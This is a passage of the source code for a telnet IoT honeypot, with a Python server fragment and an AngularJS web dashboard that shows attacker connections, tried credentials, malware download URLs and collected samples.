line = line + chr(byte) #dbg("RECV STRING " + line) return line def recv_short(self): bytes = self.sock.recv(2) short = struct.unpack("!H", bytes)[0] #dbg("RECV SHORT " + str(short)) return short def need(self, byte_need): byte = ord(self.sock.recv(1)) #if byte in Telnetd.cmds: # dbg("RECV " + str(Telnetd.cmds[byte])) #else: # dbg("RECV " + str(byte)) if byte != byte_need: dbg("BAD " + "PROTOCOL ERROR. EXIT.") raise ValueError() return byte def process_cmd(self, cmd): if cmd == Telnetd.DO: byte = self.recv() self.send(Telnetd.IAC) self.send(Telnetd.WONT) self.send(byte) if cmd == Telnetd.WILL or cmd == Telnetd.WONT: byte = self.recv() ================================================ FILE: honeypot.py ================================================ import os import sys import signal import json import socket from honeypot.telnet import Telnetd from honeypot.client import Client from honeypot.session import Session from honeypot.shell.shell import test_shell from util.dbg import dbg from util.config import config srv = None def import_file(fname): with open(fname, "rb") as fp: client = Client() for line in fp: line = line.strip() obj = json.loads(line) if obj["type"] == "connection": if obj["ip"] != None: print "conn " + obj["ip"] client.put_session(obj) if obj["type"] == "sample": print "sample " + obj["sha256"] client.put_sample_info(obj) def rerun_file(fname): with open(fname, "rb") as fp: for line in fp: line = line.strip() obj = json.loads(line) if obj["type"] == "connection": if obj["ip"] == None: continue session = Session(sys.stdout.write, obj["ip"]) session.login(obj["user"], obj["pass"]) for event in obj["stream"]: if not(event["in"]): continue sys.stdout.write(event["data"]) session.shell(event["data"].strip()) session.end() def signal_handler(signal, frame): dbg('Ctrl+C') srv.stop() if not os.path.exists("samples"): os.makedirs("samples") if __name__ == "__main__": action = None configFile = None i = 0 while i+1 < len(sys.argv): i += 1 arg = sys.argv[i] if arg == "-c": if i+1 < len(sys.argv): configFile = sys.argv[i+1] print "Using config file " + configFile i += 1 continue else: print "warning: expected argument after \"-c\"" else: action = arg if configFile: config.loadUserConfig(configFile) if action == None: socket.setdefaulttimeout(15) srv = Telnetd(config.get("telnet_addr"), config.get("telnet_port")) signal.signal(signal.SIGINT, signal_handler) srv.run() elif action == "import": fname = sys.argv[2] import_file(fname) elif action == "rerun": fname = sys.argv[2] rerun_file(fname) elif action == "shell": test_shell() else: print "Command " + action + " unknown." ================================================ FILE: html/.gitignore ================================================ db.php apiurl.js ================================================ FILE: html/admin.html ================================================

Login

Add a new user


================================================ FILE: html/asn.html ================================================

ASN Info

Name{{ asn.name }}
Country {{ asn.countryname }}
ASNAS{{ asn.asn }}
Internet Registry{{ REGISTRIES[asn.reg] }}
More Info AS{{ asn.asn }} on bgp.he.net

Connections from AS{{ asn.asn }} more

URLs located in AS{{ asn.asn }}

ConnectionsUrlSample
{{ url.connections }}{{ url.url }}{{ url.sample }}
Coming soon ================================================ FILE: html/common.js ================================================ var fakenames = ["Boar","Stallion","Yak","Beaver","Salamander","Eagle Owl","Impala","Elephant","Chameleon","Argali","Lemur","Addax","Colt","Whale","Dormouse","Budgerigar","Dugong","Squirrel","Okapi","Burro","Fish","Crocodile","Finch","Bison","Gazelle","Basilisk","Puma","Rooster","Moose","Musk Deer","Thorny Devil","Gopher","Gnu","Panther","Porpoise","Lamb","Parakeet","Marmoset","Coati","Alligator","Elk","Antelope","Kitten","Capybara","Mule","Mouse","Civet","Zebu","Horse","Bald Eagle","Raccoon","Pronghorn","Parrot","Llama","Tapir","Duckbill Platypus","Cow","Ewe","Bighorn","Hedgehog","Crow","Mustang","Panda","Otter","Mare","Goat","Dingo","Hog","Mongoose","Guanaco","Walrus","Springbok","Dog","Kangaroo","Badger","Fawn","Octopus","Buffalo","Doe","Camel","Shrew","Lovebird","Gemsbok","Mink","Lynx","Wolverine","Fox","Gorilla","Silver Fox","Wolf","Ground Hog","Meerkat","Pony","Highland Cow","Mynah Bird","Giraffe","Cougar","Eland","Ferret","Rhinoceros"]; function extractHash() { var table = {}; var values = window.location.hash.substr(1); values = values.split("&"); for (var i = 0; i < values.length; i++) { var tuple = values[i].split("="); var name = tuple[0]; var value = tuple.length > 1 ? tuple[1] : null; table[name] = value; } return table; } function formatDate(date) { d = new Date(date * 1000); return d.toTimeString().replace(/.*(\d{2}:\d{2}:\d{2}).*/, "$1"); } var months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Okt", "Nov", "Dez"]; function formatDay(date) { d = new Date(date * 1000); return d.getDate() + " " + months[d.getMonth()]; } function formatDateTime(date) { if (date == null) return ""; d = new Date(date * 1000); return d.getDate() + "." + (d.getMonth()+1) + " " + d.toTimeString().replace(/.*(\d{2}:\d{2}):\d{2}.*/, "$1"); } function time() { return Math.round(new Date().getTime() / 1000); } function nicenull (str, el) { if (str == null || str == "") return el; else return str; } function short (str, l) { if (str) return str.substring(0, l) + "..."; else return "None"; } function encurl(url) { return btoa(url); } function decurl(url) { return atob(url); } ================================================ FILE: html/connection.html ================================================

Connection Info

Date{{ formatDate(connection.date) }}
Duration{{ connection.duration }} seconds
Network / Malware #{{ connection.network.id }} / {{ connection.network.malware.name != null ? connection.network.malware.name : fakenames[connection.network.malware.id] }}
Honeypot name{{ connection.backend_user }}
IP {{ connection.city + ', ' + connection.countryname }} map
{{ connection.ip }}
AS{{ connection.asn.asn }} {{ connection.asn.name }}
{{ connection.ipblock }}
User : Password "{{ connection.user }}" : "{{ connection.password }}"
Prior Connections

{{ formatDate(associate.date) }} from {{ associate.ip }}

Subsequent Connections

{{ formatDate(associate.date) }} from {{ associate.ip }}

Tags {{ tag.name }}

URLs gathered

Url First Seen Sample
{{ url.url }} {{ formatDate(url.date) }} {{ short(url.sample, 16) }}

Session text show output

Session Text does not include non-ascii characters
{{ event.data }}
================================================ FILE: html/connectionlist-embed.html ================================================
Date IP ASN Country Username Password N⁰ Urls
{{ formatDate(connection.date) }} {{ connection.ip }} {{ connection.asn.asn }} {{ connection.country }} {{ connection.user }} {{ connection.password }} {{ connection.urls }}
================================================ FILE: html/connectionlist.html ================================================

Connections

Filters:

You may use the url bar to edit filters

Available arguments: ["ipblock", "user", "password", "ip", "country", "asn_id"]

{{ k }} == {{ v }} {{ k == 'country' ? '(' + COUNTRY_LIST[v] + ')' : '' }} {{ $last ? '' : ', ' }}
================================================ FILE: html/countries.js ================================================ var COUNTRY_LIST = {"AF":"Afghanistan","AX":"Åland Islands","AL":"Albania","DZ":"Algeria","AS":"American Samoa","AD":"AndorrA","AO":"Angola","AI":"Anguilla","AQ":"Antarctica","AG":"Antigua and Barbuda","AR":"Argentina","AM":"Armenia","AW":"Aruba","AU":"Australia","AT":"Austria","AZ":"Azerbaijan","BS":"Bahamas","BH":"Bahrain","BD":"Bangladesh","BB":"Barbados","BY":"Belarus","BE":"Belgium","BZ":"Belize","BJ":"Benin","BM":"Bermuda","BT":"Bhutan","BO":"Bolivia","BA":"Bosnia and Herzegovina","BW":"Botswana","BV":"Bouvet Island","BR":"Brazil","IO":"British Indian Ocean Territory","BN":"Brunei Darussalam","BG":"Bulgaria","BF":"Burkina Faso","BI":"Burundi","KH":"Cambodia","CM":"Cameroon","CA":"Canada","CV":"Cape Verde","KY":"Cayman Islands","CF":"Central African Republic","TD":"Chad","CL":"Chile","CN":"China","CX":"Christmas Island","CC":"Cocos (Keeling) Islands","CO":"Colombia","KM":"Comoros","CG":"Congo","CD":"Congo, The Democratic Republic of the","CK":"Cook Islands","CR":"Costa Rica","CI":"Cote D'Ivoire","HR":"Croatia","CU":"Cuba","CY":"Cyprus","CZ":"Czech Republic","DK":"Denmark","DJ":"Djibouti","DM":"Dominica","DO":"Dominican Republic","EC":"Ecuador","EG":"Egypt","SV":"El Salvador","GQ":"Equatorial Guinea","ER":"Eritrea","EE":"Estonia","ET":"Ethiopia","FK":"Falkland Islands (Malvinas)","FO":"Faroe Islands","FJ":"Fiji","FI":"Finland","FR":"France","GF":"French Guiana","PF":"French Polynesia","TF":"French Southern Territories","GA":"Gabon","GM":"Gambia","GE":"Georgia","DE":"Germany","GH":"Ghana","GI":"Gibraltar","GR":"Greece","GL":"Greenland","GD":"Grenada","GP":"Guadeloupe","GU":"Guam","GT":"Guatemala","GG":"Guernsey","GN":"Guinea","GW":"Guinea-Bissau","GY":"Guyana","HT":"Haiti","HM":"Heard Island and Mcdonald Islands","VA":"Holy See (Vatican City State)","HN":"Honduras","HK":"Hong Kong","HU":"Hungary","IS":"Iceland","IN":"India","ID":"Indonesia","IR":"Iran, Islamic Republic Of","IQ":"Iraq","IE":"Ireland","IM":"Isle of Man","IL":"Israel","IT":"Italy","JM":"Jamaica","JP":"Japan","JE":"Jersey","JO":"Jordan","KZ":"Kazakhstan","KE":"Kenya","KI":"Kiribati","KP":"Korea, Democratic People'S Republic of","KR":"Korea, Republic of","KW":"Kuwait","KG":"Kyrgyzstan","LA":"Lao People'S Democratic Republic","LV":"Latvia","LB":"Lebanon","LS":"Lesotho","LR":"Liberia","LY":"Libyan Arab Jamahiriya","LI":"Liechtenstein","LT":"Lithuania","LU":"Luxembourg","MO":"Macao","MK":"Macedonia, The Former Yugoslav Republic of","MG":"Madagascar","MW":"Malawi","MY":"Malaysia","MV":"Maldives","ML":"Mali","MT":"Malta","MH":"Marshall Islands","MQ":"Martinique","MR":"Mauritania","MU":"Mauritius","YT":"Mayotte","MX":"Mexico","FM":"Micronesia, Federated States of","MD":"Moldova, Republic of","MC":"Monaco","MN":"Mongolia","MS":"Montserrat","MA":"Morocco","MZ":"Mozambique","MM":"Myanmar","NA":"Namibia","NR":"Nauru","NP":"Nepal","NL":"Netherlands","AN":"Netherlands Antilles","NC":"New Caledonia","NZ":"New Zealand","NI":"Nicaragua","NE":"Niger","NG":"Nigeria","NU":"Niue","NF":"Norfolk Island","MP":"Northern Mariana Islands","NO":"Norway","OM":"Oman","PK":"Pakistan","PW":"Palau","PS":"Palestinian Territory, Occupied","PA":"Panama","PG":"Papua New Guinea","PY":"Paraguay","PE":"Peru","PH":"Philippines","PN":"Pitcairn","PL":"Poland","PT":"Portugal","PR":"Puerto Rico","QA":"Qatar","RE":"Reunion","RO":"Romania","RU":"Russian Federation","RW":"RWANDA","SH":"Saint Helena","KN":"Saint Kitts and Nevis","LC":"Saint Lucia","PM":"Saint Pierre and Miquelon","VC":"Saint Vincent and the Grenadines","WS":"Samoa","SM":"San Marino","ST":"Sao Tome and Principe","SA":"Saudi Arabia","SN":"Senegal","CS":"Serbia and Montenegro","SC":"Seychelles","SL":"Sierra Leone","SG":"Singapore","SK":"Slovakia","SI":"Slovenia","SB":"Solomon Islands","SO":"Somalia","ZA":"South Africa","GS":"South Georgia and the South Sandwich Islands","ES":"Spain","LK":"Sri Lanka","SD":"Sudan","SR":"Suriname","SJ":"Svalbard and Jan Mayen","SZ":"Swaziland","SE":"Sweden","CH":"Switzerland","SY":"Syrian Arab Republic","TW":"Taiwan, Province of China","TJ":"Tajikistan","TZ":"Tanzania, United Republic of","TH":"Thailand","TL":"Timor-Leste","TG":"Togo","TK":"Tokelau","TO":"Tonga","TT":"Trinidad and Tobago","TN":"Tunisia","TR":"Turkey","TM":"Turkmenistan","TC":"Turks and Caicos Islands","TV":"Tuvalu","UG":"Uganda","UA":"Ukraine","AE":"United Arab Emirates","GB":"United Kingdom","US":"United States","UM":"United States Minor Outlying Islands","UY":"Uruguay","UZ":"Uzbekistan","VU":"Vanuatu","VE":"Venezuela","VN":"Viet Nam","VG":"Virgin Islands, British","VI":"Virgin Islands, U.S.","WF":"Wallis and Futuna","EH":"Western Sahara","YE":"Yemen","ZM":"Zambia","ZW":"Zimbabwe", "EU": "European Union"}; ================================================ FILE: html/fancy/connhash/index.html ================================================ Network | Hierarchical layout
================================================ FILE: html/fancy/graph/index.html ================================================

================================================ FILE: html/img/LICENSE ================================================ Bee Icon by alican https://thenounproject.com/search/?q=bee&i=573797 CC BY 3.0 (https://creativecommons.org/licenses/by/3.0/us/) ================================================ FILE: html/img/flags/LICENSE ================================================ Flag icons - http://www.famfamfam.com These icons are public domain, and as such are free for any use (attribution appreciated but not required). Note that these flags are named using the ISO3166-1 alpha-2 country codes where appropriate. A list of codes can be found at http://en.wikipedia.org/wiki/ISO_3166-1_alpha-2 If you find these icons useful, please donate via paypal to mjames@gmail.com (or click the donate button available at http://www.famfamfam.com/lab/icons/silk) Contact: mjames@gmail.com ================================================ FILE: html/index.html ================================================
================================================ FILE: html/js/angular-vis.js ================================================ angular.module('ngVis', []) .factory('VisDataSet', function () { 'use strict'; return function (data, options) { // Create the new dataSets return new vis.DataSet(data, options); }; }) /** * TimeLine directive */ .directive('visTimeline', function () { 'use strict'; return { restrict: 'EA', transclude: false, scope: { data: '=', options: '=', events: '=' }, link: function (scope, element, attr) { var timelineEvents = [ 'rangechange', 'rangechanged', 'timechange', 'timechanged', 'select', 'doubleClick', 'click', 'contextmenu' ]; // Declare the timeline var timeline = null; scope.$watch('data', function () { // Sanity check console.log(scope.data); if (scope.data == null) { return; } // If we've actually changed the data set, then recreate the graph // We can always update the data by adding more data to the existing data set if (timeline != null) { timeline.destroy(); } // Create the timeline object console.log(scope.data); timeline = new vis.Timeline(element[0], scope.data.items, scope.data.groups, scope.options); // Attach an event handler if defined angular.forEach(scope.events, function (callback, event) { if (timelineEvents.indexOf(String(event)) >= 0) { timeline.on(event, callback); } }); // onLoad callback if (scope.events != null && scope.events.onload != null && angular.isFunction(scope.events.onload)) { scope.events.onload(timeline); } }); scope.$watchCollection('options', function (options) { if (timeline == null) { return; } timeline.setOptions(options); }); } }; }) /** * Directive for network chart. */ .directive('visNetwork', function () { return { restrict: 'EA', transclude: false, scope: { data: '=', options: '=', events: '=' }, link: function (scope, element, attr) { var networkEvents = [ 'click', 'doubleclick', 'oncontext', 'hold', 'release', 'selectNode', 'selectEdge', 'deselectNode', 'deselectEdge', 'dragStart', 'dragging', 'dragEnd', 'hoverNode', 'blurNode', 'zoom', 'showPopup', 'hidePopup', 'startStabilizing', 'stabilizationProgress', 'stabilizationIterationsDone', 'stabilized', 'resize', 'initRedraw', 'beforeDrawing', 'afterDrawing', 'animationFinished' ]; var network = null; scope.$watch('data', function () { // Sanity check if (scope.data == null) { return; } // If we've actually changed the data set, then recreate the graph // We can always update the data by adding more data to the existing data set if (network != null) { network.destroy(); } // Create the graph2d object network = new vis.Network(element[0], scope.data, scope.options); // Attach an event handler if defined angular.forEach(scope.events, function (callback, event) { if (networkEvents.indexOf(String(event)) >= 0) { network.on(event, callback); } }); // onLoad callback if (scope.events != null && scope.events.onload != null && angular.isFunction(scope.events.onload)) { scope.events.onload(graph); } }); scope.$watchCollection('options', function (options) { if (network == null) { return; } network.setOptions(options); }); } }; }) /** * Directive for graph2d. */ .directive('visGraph2d', function () { 'use strict'; return { restrict: 'EA', transclude: false, scope: { data: '=', options: '=', events: '=' }, link: function (scope, element, attr) { var graphEvents = [ 'rangechange', 'rangechanged', 'timechange', 'timechanged', 'finishedRedraw' ]; // Create the chart var graph = null; scope.$watch('data', function () { // Sanity check if (scope.data == null) { return; } // If we've actually changed the data set, then recreate the graph // We can always update the data by adding more data to the existing data set if (graph != null) { graph.destroy(); } // Create the graph2d object graph = new vis.Graph2d(element[0], scope.data.items, scope.data.groups, scope.options); // Attach an event handler if defined angular.forEach(scope.events, function (callback, event) { if (graphEvents.indexOf(String(event)) >= 0) { graph.on(event, callback); } }); // onLoad callback if (scope.events != null && scope.events.onload != null && angular.isFunction(scope.events.onload)) { scope.events.onload(graph); } }); scope.$watchCollection('options', function (options) { if (graph == null) { return; } graph.setOptions(options); }); } }; }) ; ================================================ FILE: html/network.html ================================================

Network Info

id#{{ network.id }}
Malware{{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }} see
Connections{{ network.firstconns }} / {{ network.connections }} from {{ formatDate(network.firsttime) }} to {{ formatDate(network.lasttime) }} see all
Urls{{ network.urls }}
Samples{{ network.samples }}
Initial Connections per Hour

Connections by honeypot

Name Connections
{{ name }} {{ count }}

Network graph load graph

================================================ FILE: html/networks.html ================================================

Networks

Initial Connections per Hour
# Malware N⁰ initial Conn's N⁰ Urls N⁰ Samples
#{{network.id}} {{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }} {{ network.firstconns }} {{ network.urls }} {{ network.samples }}
================================================ FILE: html/overview.html ================================================

This is the start page of this installation of the Telnet-Iot-Honeypot.
More info: https://github.com/Phype/telnet-iot-honeypot

Latest Urls

Url Date
{{ url.url }} {{ formatDate(url.date) }}

Latest Samples

Name Size (Bytes) First Seen
{{ sample.name }} {{ sample.length }} {{ formatDate(sample.date) }}

Latest Connections more

Date Country Username Password
{{ formatDate(connection.date) }} {{ connection.country }} {{ connection.user }} {{ connection.password }}

All Connections by Country
Click on country to see all connections
================================================ FILE: html/sample.html ================================================

Sample Info

First seen{{ formatDate(sample.date) }}
First seen file name{{ sample.name }}
File size{{ sample.length }} Bytes
SHA256{{ sample.sha256 }}
Virustotal result {{ sample.result }} Unknown, search yourself
Network / Malware #{{ sample.network.id }} / {{ sample.network.malware.name != null ? sample.network.malware.name : fakenames[sample.network.malware.id] }}

Download Info

{{ sample.info }}

Downloaded from

Url Date N⁰ Connections
{{ url.url }} {{ formatDate(url.date) }} {{ url.connections.length }}
================================================ FILE: html/sample.js ================================================ var isMobile = false; //initiate as false // device detection if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|ipad|iris|kindle|Android|Silk|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(navigator.userAgent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(navigator.userAgent.substr(0,4))) isMobile = true; var app = angular.module('honey', ["ngRoute", "chart.js", "ngVis"]); app.config(function($routeProvider) { $routeProvider .when("/samples", { templateUrl : "samples.html", controller : "samples" }) .when("/sample/:sha256", { templateUrl : "sample.html", controller : "sample" }) .when("/urls", { templateUrl : "urls.html", controller : "urls" }) .when("/url/:url", { templateUrl : "url.html", controller : "url" }) .when("/tag/:tag", { templateUrl : "tag.html", controller : "tag" }) .when("/connection/:id", { templateUrl : "connection.html", controller : "connection" }) .when("/asn/:asn", { templateUrl : "asn.html", controller : "asn" }) .when("/networks", { templateUrl : "networks.html", controller : "networks" }) .when("/network/:id", { templateUrl : "network.html", controller : "network" }) .when("/connections", { templateUrl : "connectionlist.html", controller : "connectionlist" }) .when("/tags", { templateUrl : "tags.html", controller : "tags" }) .when("/admin", { templateUrl : "admin.html", controller : "admin" }) .when("/", { templateUrl : "overview.html", controller : "overview" }) .otherwise({ template: '

Error

View not found.
Go to index' }); }); app.controller('overview', function($scope, $http, $routeParams, $location) { $scope.urls = null; $scope.samples = null; $scope.connections = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $scope.chart_options = { "animation": isMobile ? false : {} }; $http.get(api + "/url/newest").then(function (httpResult) { $scope.urls = httpResult.data; }); $http.get(api + "/sample/newest").then(function (httpResult) { $scope.samples = httpResult.data; }); $http.get(api + "/connections").then(function (httpResult) { $scope.connections = httpResult.data; }); $http.get(api + "/connection/statistics/per_country").then(function (httpResult) { httpResult.data.sort(function(a, b) { return b[0] - a[0] }); $scope.country_stats_values = httpResult.data.map(function(x) {return x[0]}); $scope.country_stats_labels = httpResult.data.map(function(x) {return COUNTRY_LIST[x[1]]}); $scope.country_stats_data = httpResult.data.map(function(x) {return x[1]}); }); $scope.clickchart_countries = function(a,b,c,d,e) { var c = $scope.country_stats_data[c._index]; $location.path("/connections").search({country: c}); $scope.$apply() }; }); app.controller('samples', function($scope, $http, $routeParams) { $scope.samples = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $http.get(api + "/sample/newest").then(function (httpResult) { $scope.samples = httpResult.data; }); }); app.controller('sample', function($scope, $http, $routeParams) { $scope.sample = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $scope.short = function (str) { if (str) return str.substring(0, 16) + "..."; else return "None"; }; var sha256 = $routeParams.sha256; $http.get(api + "/sample/" + sha256).then(function (httpResult) { $scope.sample = httpResult.data; }); }); app.controller('urls', function($scope, $http, $routeParams) { $scope.url = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $http.get(api + "/url/newest").then(function (httpResult) { $scope.urls = httpResult.data; }); }); app.controller('tags', function($scope, $http, $routeParams) { $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $http.get(api + "/tags").then(function (httpResult) { $scope.tags = httpResult.data; }); }); var graph_accumulate_hours = 6; var graph_tstep = 60 * 60 * graph_accumulate_hours; function roundDate(date) { return Math.floor(date / graph_tstep); }; function network_graph_data(networks) { var firsttime = +Infinity; var lasttime = -Infinity; var datasets = []; for (var i = 0; i < networks.length; i++) { var network = networks[i]; var firsttime_net = Math.min.apply(null, network.connectiontimes); var lasttime_net = Math.max.apply(null, network.connectiontimes); firsttime = Math.min(firsttime, firsttime_net); lasttime = Math.min(lasttime, lasttime_net); } var first = roundDate(firsttime); var last = roundDate(lasttime); var now = time(); for (var j = 0; j < networks.length; j++) { var network = networks[j]; var data = new Array((roundDate(now) - first) + 1).fill(0); for (var i = 0; i < network.connectiontimes.length; i++) { var t = network.connectiontimes[i]; var r = roundDate(now - t); data[r] += (1/graph_accumulate_hours); } data.reverse(); data = data.map(function (x) {return Math.round(x*100)/100;}); datasets.push(data); } var labels = datasets[0].map(function(v,i,a) { var tdiff = (a.length-i-1) * graph_tstep; return formatDateTime(now - tdiff); }); return { "datasets": datasets, "labels": labels, "firsttime": firsttime, "lasttime": lasttime }; } app.controller('networks', function($scope, $http, $routeParams) { $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; var networks_show_graph = 4; var networks_got = 0; var networks_requested = 0; $http.get(api + "/networks").then(function (httpResult) { $scope.networks = httpResult.data; for (var i = 0; i < $scope.networks.length; i++) { var item = $scope.networks[i]; item.order = item.firstconns; } $scope.networks.sort(function (a, b) { return a.order-b.order; }); $scope.networks.reverse(); networks_requested = Math.min(networks_show_graph, $scope.networks.length); $scope.networks_graph = []; $scope.timechart_series = []; $http.get(api + "/network/biggest_history").then(function (httpResult) { var nets = httpResult.data; $scope.timechart_data = []; for (var i = 0; i < nets.length; i++) { $scope.timechart_data.push( nets[i].data.map(function(x){ return x[1]; }) ); $scope.timechart_series.push(nets[i].network.malware.name + " #" + nets[i].network.id); } $scope.timechart_labels = nets[0].data.map(function(x){ return formatDay(x[0]); }); console.log($scope.timechart_data); console.log($scope.timechart_labels); networks_got = nets.length; }); }); $scope.draw = function() { var ret = network_graph_data($scope.networks_graph); $scope.timechart_data = ret.datasets; $scope.timechart_labels = ret.labels; }; $scope.filterNoSamples = function(network) { return true; // network.samples.length > 0; }; $scope.timechart_options = { "animation": isMobile ? false : {}, "responsive": true, "maintainAspectRatio": false, legend: { display: true, position: 'top', }, elements: { line: { fill: false } } }; }); app.controller('network', function($scope, $http, $routeParams) { $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; var id = $routeParams.id; $http.get(api + "/network/" + id).then(function (httpResult) { $scope.network = httpResult.data; var ret = network_graph_data([$scope.network]); $scope.network.firsttime = ret.firsttime; $scope.network.lasttime = ret.lasttime; $scope.timechart_data = ret.datasets; $scope.timechart_labels = ret.labels; }); $scope.timechart_options = { "animation": isMobile ? false : {}, "responsive": true, "maintainAspectRatio": false, }; $scope.graph_events = { "click": function(ev) { if (ev.nodes.length == 1) { var n = ev.nodes[0]; var d = n.substr(2); var link = null; if (n.startsWith("i:")) link = "#/connections?ip=" + d; if (n.startsWith("s:")) link = "#/sample/" + d; if (n.startsWith("u:")) link = "#/url/" + encurl(d); window.location.href = link; } } }; $scope.graph_options = { "interaction": { "tooltipDelay": 0 }, }; $scope.graph_data = { "nodes": [], "edges": [] }; $scope.graph_enabled = false; $scope.loadgraph = function() { var graph_nodes = []; var graph_nodes_set = {}; var node = function(n) { if (! (n in graph_nodes_set)) { var color = "#dddddd"; // ip if (n.startsWith("s:")) color = "#ffbbbb"; // sample if (n.startsWith("u:")) color = "#bbbbff"; // url graph_nodes.push({ "id": n, "label": "", "title": n.substring(2), "color": color }); graph_nodes_set[n] = true; } }; var graph_edges = $scope.network.has_infected.map(function(e) { node(e[0]); node(e[1]); return { "from": e[0], "to": e[1], "id": e[0] + "-" + e[1] }; }); $scope.graph_data = { "nodes": graph_nodes, "edges": graph_edges }; $scope.graph_enabled = true; }; }); app.controller('url', function($scope, $http, $routeParams) { $scope.url = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; var url = $routeParams.url; $http.get(api + "/url/" + url).then(function (httpResult) { $scope.url = httpResult.data; $scope.url.countryname = COUNTRY_LIST[$scope.url.country]; }); }); app.controller('tag', function($scope, $http, $routeParams) { $scope.tag = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; var tag = $routeParams.tag; $http.get(api + "/tag/" + tag).then(function (httpResult) { $scope.tag = httpResult.data; $scope.connections = $scope.tag.connections; }); }); app.controller('connection', function($scope, $http, $routeParams) { $scope.connection = null; $scope.lines = []; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.displayoutput = true; $scope.fakenames = fakenames; var id = $routeParams.id; $http.get(api + "/connection/" + id).then(function (httpResult) { $scope.connection = httpResult.data; $scope.connection.countryname = COUNTRY_LIST[$scope.connection.country]; var last_i = $scope.connection.stream.length - 1; $scope.connection.duration = $scope.connection.stream[last_i].ts; }); }); app.controller('connectionlist', function($scope, $http, $routeParams, $location) { $scope.connection = null; $scope.lines = []; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.COUNTRY_LIST = COUNTRY_LIST; $scope.fakenames = fakenames; $scope.filter = $routeParams; var url = api + "/connections?"; for (key in $routeParams) { url = url + key + "=" + $routeParams[key] + "&"; } $http.get(url).then(function (httpResult) { $scope.connections = httpResult.data; $scope.connections.map(function(connection) { connection.contryname = COUNTRY_LIST[connection.country]; return connection; }); }); $scope.nextpage = function() { var filter = $scope.filter; filter['older_than'] = $scope.connections[$scope.connections.length - 1].date; $location.path("/connections").search(filter); $scope.$apply(); }; }); app.controller('asn', function($scope, $http, $routeParams, $location) { 